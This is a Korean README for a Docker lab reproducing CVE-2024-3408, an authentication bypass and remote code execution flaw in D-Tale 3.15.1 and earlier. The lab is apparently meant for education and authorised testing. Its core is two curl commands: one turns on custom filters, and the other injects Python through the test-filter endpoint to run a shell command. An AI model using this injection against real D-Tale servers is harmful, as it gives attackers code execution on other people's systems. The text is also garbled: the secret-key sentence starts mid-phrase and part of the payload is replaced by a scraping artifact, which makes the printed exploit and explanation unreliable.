
CVE-2024-3408 - D-Tale 인증 우회 및 RCE를 위한 취약점 실습 환경
CVE-2024-3408에 대한 재현 가능한 실습 환경입니다. 이는 D-Tale의 인증 우회 및 원격 코드 실행 취약점입니다.
D-Tale 3.15.1 이하 버전은 다음 이유로 취약합니다:
"Dtale") - Flask 세션 서명에 사용되어 세션 쿠키 위조 허용test-filter 엔드포인트는 pandas 쿼리를 사용하는데, 이를 악용하여 임의의 Python 코드를 실행할 수 있습니다.CVSS: 9.8 (심각)
영향받는 버전: D-Tale <= 3.15.1
docker compose up -d --build
D-Tale은 http://localhost:40000에서 사용할 수 있습니다.
# Step 1: Enable custom filters
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Expected: {"success":true}
# Step 2: Execute command via pandas query injection
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
--data-urlencode "[email protected].__import__('os').popen('id').read()"
# Expected: Response contains "uid=" and "gid=" (command output in error message)
docker compose down
이 실습 환경은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 소유하지 않거나 테스트 권한이 없는 시스템에 사용하지 마십시오.